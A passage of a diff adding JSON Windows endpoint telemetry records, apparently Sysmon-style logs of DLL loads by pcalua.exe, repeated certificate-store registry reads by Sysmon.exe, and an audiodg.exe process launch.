"image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ndfapi.dll", + "image_path": "C:\\Windows\\System32\\ndfapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wdi.dll", + "image_path": "C:\\Windows\\System32\\wdi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software 
Publishing", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\AUDIODG.EXE 0x318", + "event_type": "process", + "logon_id": 997, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 6784, + "ppid": 2136, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "subtype": "create", + "timestamp": 131883573975300000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}", + "unique_ppid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573975259984, + 
"unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 